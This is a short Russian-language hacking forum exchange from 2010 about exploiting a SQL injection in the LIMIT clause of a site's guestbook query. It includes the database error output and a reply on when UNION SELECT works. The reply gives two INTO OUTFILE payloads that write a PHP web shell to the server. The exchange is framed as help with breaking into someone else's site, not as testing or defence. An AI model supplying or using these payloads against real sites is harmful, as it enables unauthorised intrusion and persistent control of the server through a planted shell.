28.09.2010, 15:10
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Derec
Друзья, по всей видимости есть уязвимость на одном сайте:
http://site.com/feedback/index/20'
при этом вижу ошибку:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6
SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10
Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!
Инъекция в лимите.
В данном случае инъекция не возможна из за присутствия order by.
Если нет order by, то крутиться, как обычно, через union select
Если позволяют условия, то попробуй сразу залить шелл:
1 limit 1 into outfile '/path/shell.php' lines terminated by "" --
1 limit 1 into outfile '/path/shell.php' fields terminated by '' optionally enclosed by "" --
|
|
|